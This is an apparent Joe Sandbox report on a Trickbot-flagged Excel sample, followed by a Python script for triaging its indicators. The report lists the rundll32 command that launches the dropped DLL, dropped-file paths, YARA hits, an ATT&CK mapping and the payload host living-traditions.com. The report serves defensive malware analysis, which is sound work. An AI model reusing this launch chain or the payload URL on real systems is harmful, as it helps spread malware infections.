Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\fdinmd.fii,StartW (the report lists this event three times)
Source: C:\Windows\SysWOW64\rundll32.exe, Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe (the report lists this event twice)
Source: Window Recorder, Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 1_2_040727CB push dword ptr [edx+14h]; ret 1_2_0407282D (the push/ret sequence behind the "code obfuscation techniques (call, push, ret)" signature)
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_04072720 push dword ptr [edx+14h]; ret 1_2_0407282D
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclickJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclickJump to dropped file
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\fdinmd.fiiJump to dropped file

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\fdinmd.fii
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (this identical entry is reported 62 times)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\SQCTO[1].perclick
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe

Stealing of Sensitive Information:

Yara detected Trickbot
Source: Yara match | File source: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.236724991.0000000003FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.236774437.0000000004030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.rundll32.exe.4030000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.rundll32.exe.3fb0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.rundll32.exe.4030000.3.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Trickbot
Source: Yara match | File source: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.236724991.0000000003FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.236774437.0000000004030000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.rundll32.exe.4030000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.rundll32.exe.3fb0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.rundll32.exe.4030000.3.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

The matrix is listed per tactic column. Trailing digits after a technique name are the report's superscript annotations, kept as extracted.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Scripting 21; Exploitation for Client Execution 33; At (Linux); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection 11; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Masquerading 121; Disable or Modify Tools 1; Rundll32 1; Process Injection 11; Scripting 21; Obfuscated Files or Information 1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: File and Directory Discovery 1; System Information Discovery 2; Query Registry; System Network Configuration Discovery; Remote System Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Non-Application Layer Protocol 2; Application Layer Protocol 12; Ingress Tool Transfer 1; Protocol Impersonation; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

Behavior Graph

Screenshots

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
1.2.rundll32.exe.4030000.3.unpack | 100% | Avira | HEUR/AGEN.1138157

Domains

Source | Detection | Scanner
living-traditions.com | 0% | Virustotal
clientconfig.passport.net | 0% | Virustotal

URLs

Source | Detection | Scanner | Label
https://cdn.entity. | 0% | URL Reputation | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Virustotal
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Virustotal
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
http://living-traditions.com/blogs/click.php | 0% | Avira URL Cloud | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 0% | URL Reputation | safe
https://ncus.pagecontentsync. | 0% | URL Reputation | safe
https://skyapi.live.net/Activity/ | 0% | URL Reputation | safe
https://dataservice.o365filtering.com | 0% | URL Reputation | safe
https://api.cortana.ai | 0% | URL Reputation | safe
https://ovisualuiapp.azurewebsites.net/pbiagave/ | 0% | Avira URL Cloud | safe
https://directory.services. | 0% | URL Reputation | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
living-traditions.com | 64.207.186.30 | true | false | - | unknown
clientconfig.passport.net | unknown | unknown | true | - | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://living-traditions.com/blogs/click.php | false | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://login.microsoftonline.com/ | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://shell.suite.office.com:1443 | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://autodiscover-s.outlook.com/ | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://cdn.entity. | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://powerlift.acompli.net | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://cortana.ai | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://cloudfiles.onenote.com/upload.aspx | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://entitlement.diagnosticssdf.office.com | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://api.aadrm.com/ | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://api.microsoftstream.com/api/ | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://cr.office.com | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://portal.office.com/account/?ref=ClientMeControl | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://ecs.office.com/config/v2/Office | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://graph.ppe.windows.net | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://res.getmicrosoftkey.com/api/redemptionevents | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://officeci.azurewebsites.net/api/ | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | Virustotal: 0%; Avira URL Cloud: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://store.office.cn/addinstemplate | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://globaldisco.crm.dynamics.com | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | - | high
https://store.officeppe.com/addinstemplate | 7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr | false | URL Reputation: safe | unknown
                                                                    https://dev0-api.acompli.net/autodetect7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://www.odwebp.svc.ms7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://api.powerbi.com/v1.0/myorg/groups7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                      high
                                                                      https://web.microsoftstream.com/video/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                        high
                                                                        https://graph.windows.net7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                          high
                                                                          https://dataservice.o365filtering.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://officesetup.getmicrosoftkey.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://analysis.windows.net/powerbi/api7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                            high
                                                                            https://prod-global-autodetect.acompli.net/autodetect7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://outlook.office365.com/autodiscover/autodiscover.json7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                              high
                                                                              https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                high
                                                                                https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                  high
                                                                                  https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                    high
                                                                                    https://ncus.contentsync.7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                      high
                                                                                      https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                        high
                                                                                        http://weather.service.msn.com/data.aspx7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                          high
                                                                                          https://apis.live.net/v5.0/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                            high
                                                                                            https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                              high
                                                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                high
                                                                                                https://management.azure.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                  high
                                                                                                  https://wus2.contentsync.7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://incidents.diagnostics.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                    high
                                                                                                    https://clients.config.office.net/user/v1.0/ios7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                      high
                                                                                                      https://insertmedia.bing.office.net/odc/insertmedia7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                        high
                                                                                                        https://o365auditrealtimeingestion.manage.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                          high
                                                                                                          https://outlook.office365.com/api/v1.0/me/Activities7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                            high
                                                                                                            https://api.office.net7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                              high
                                                                                                              https://incidents.diagnosticssdf.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                high
                                                                                                                https://asgsmsproxyapi.azurewebsites.net/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://clients.config.office.net/user/v1.0/android/policies7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                  high
                                                                                                                  https://entitlement.diagnostics.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                    high
                                                                                                                    https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                      high
                                                                                                                      https://outlook.office.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                        high
                                                                                                                        https://storage.live.com/clientlogs/uploadlocation7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                          high
                                                                                                                          https://templatelogging.office.com/client/log7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                            high
                                                                                                                            https://outlook.office365.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                              high
                                                                                                                              https://webshell.suite.office.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                high
                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://management.azure.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://login.windows.net/common/oauth2/authorize7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://graph.windows.net/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://api.powerbi.com/beta/myorg/imports7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://devnull.onenote.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ncus.pagecontentsync.7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://messaging.office.com/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://augloop.office.com/v27313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://skyapi.live.net/Activity/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      https://clients.config.office.net/user/v1.0/mac7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://dataservice.o365filtering.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://api.cortana.ai7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://onedrive.live.com7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://ovisualuiapp.azurewebsites.net/pbiagave/7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          unknown
                                                                                                                                                          https://visio.uservoice.com/forums/368202-visio-on-devices7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://directory.services.7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            https://login.windows-ppe.net/common/oauth2/authorize7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.drfalse
                                                                                                                                                              high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
64.207.186.30 | living-traditions.com | United States (US) | 398110 | GO-DADDY-COM-LLC | false
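The URL table above is almost entirely Office first-party endpoints recovered from a dropped Office configuration file, while the Contacted IPs table holds the single public host the sample actually reached during detonation. The Python below is an added example and not part of the Joe Sandbox report: it sorts rows of these two tables into ioc / review / noise buckets, drops first-party telemetry hosts, and keeps every observed contact as a candidate IOC regardless of the Malicious column, treating that column as a reputation verdict at analysis time rather than as proof of benign behaviour. The sample rows are constructed from entries visible on this page; the FIRST_PARTY allowlist is an assumption for illustration.

```python
"""Triage of a sandbox report's URL and contacted-IP tables.

Added example for this page; it is not Joe Sandbox code. Row values are
constructed from entries visible on the page; FIRST_PARTY is an assumed
allowlist, not something the report defines.
"""
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class UrlRow:
    url: str
    source: str       # file the string was found in (here a dropped Office file)
    malicious: bool   # report's Malicious column
    reputation: str   # report's Reputation column: high / unknown / low / malicious


@dataclass(frozen=True)
class IpRow:
    ip: str
    domain: str
    country: str
    asn: int
    asn_name: str
    malicious: bool


# Domains Office itself talks to. A URL under one of these, found in an
# Office configuration drop, is client telemetry rather than an indicator.
# ASSUMPTION: illustrative allowlist; tune it for your environment.
FIRST_PARTY = (
    "office.com", "office.net", "office365.com", "microsoft.com",
    "windows.net", "live.com", "live.net", "onenote.com", "acompli.net",
    "lync.com", "msn.com", "azure.com", "dynamics.com", "powerbi.com",
    "outlook.com", "getmicrosoftkey.com",
)


def host_of(url: str) -> str:
    """Hostname of a URL. A trailing dot marks a string truncated in memory."""
    host = urlsplit(url).hostname or ""
    return host.rstrip(".").lower()


def is_first_party(host: str) -> bool:
    """Exact or subdomain match against the allowlist."""
    return any(host == d or host.endswith("." + d) for d in FIRST_PARTY)


def triage_urls(rows):
    """Split URL rows into ioc / review / noise buckets."""
    buckets = {"ioc": [], "review": [], "noise": []}
    for r in rows:
        if r.malicious or r.reputation in ("malicious", "low"):
            buckets["ioc"].append(r.url)
        elif r.reputation == "unknown" and not is_first_party(host_of(r.url)):
            # Unknown reputation on a third-party host: an analyst looks at it.
            buckets["review"].append(r.url)
        else:
            buckets["noise"].append(r.url)
    return buckets


def triage_ips(rows):
    """Every observed contact outside the first-party set is a candidate IOC.

    The Malicious column is a reputation verdict at analysis time, so a
    freshly registered host can score 'false'; the contact itself is the
    evidence, and the verdict is only carried along for context."""
    return [
        {"ip": r.ip, "domain": r.domain, "asn": f"AS{r.asn} {r.asn_name}",
         "reputation_malicious": r.malicious}
        for r in rows
        if not is_first_party(r.domain)
    ]


SRC = "7313A428-7830-4ECB-88E3-B5B1143EDDDA.0.dr"
# Constructed sample: a handful of the rows shown on this page.
URL_ROWS = [
    UrlRow("https://ecs.office.com/config/v2/Office", SRC, False, "high"),
    UrlRow("https://dev0-api.acompli.net/autodetect", SRC, False, "unknown"),
    UrlRow("https://officeci.azurewebsites.net/api/", SRC, False, "unknown"),
    UrlRow("https://api.cortana.ai", SRC, False, "unknown"),
    UrlRow("https://ncus.contentsync.", SRC, False, "unknown"),  # truncated string
]
IP_ROWS = [
    IpRow("64.207.186.30", "living-traditions.com", "US", 398110,
          "GO-DADDY-COM-LLC", False),
]

if __name__ == "__main__":
    for bucket, urls in triage_urls(URL_ROWS).items():
        print(bucket, urls)
    for hit in triage_ips(IP_ROWS):
        print("candidate IOC:", hit)
```

With the constructed rows, the two Office endpoints land in noise (one by reputation, one by the allowlist), the two third-party hosts and the truncated contentsync string go to review, and the GoDaddy-hosted IP comes out as the only candidate IOC even though the report rates it Malicious: false.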

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 385552
Start date: 12.04.2021
Start time: 17:11:27
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 7m 10s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 446446.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal96.troj.expl.evad.winXLS@5/8@2/1
                                                                                                                                                              EGA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              HDC Information:
                                                                                                                                                              • Successful, ratio: 23.1% (good quality ratio 19.2%)
                                                                                                                                                              • Quality average: 69.3%
                                                                                                                                                              • Quality standard deviation: 43.6%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 83%
                                                                                                                                                              • Number of executed functions: 3
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xls
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
                                                                                                                                                              • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
